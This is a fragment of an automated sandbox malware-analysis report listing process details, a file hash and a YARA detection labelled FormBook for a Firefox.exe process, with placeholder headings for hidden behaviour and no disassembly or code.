                                                                            Commandline:"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                                                                            Imagebase:0x1240000
                                                                            File size:517'064 bytes
                                                                            MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.481410737.0000000000210000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:true
                                                                            Show Windows behavior

                                                                            File Activities

                                                                            Show Windows behavior

                                                                            Section Activities

                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            Show Windows behavior

                                                                            Process Activities

                                                                            Show Windows behavior

                                                                            Thread Activities

                                                                            Show Windows behavior

                                                                            Memory Activities

                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                            Disassembly

                                                                            No disassembly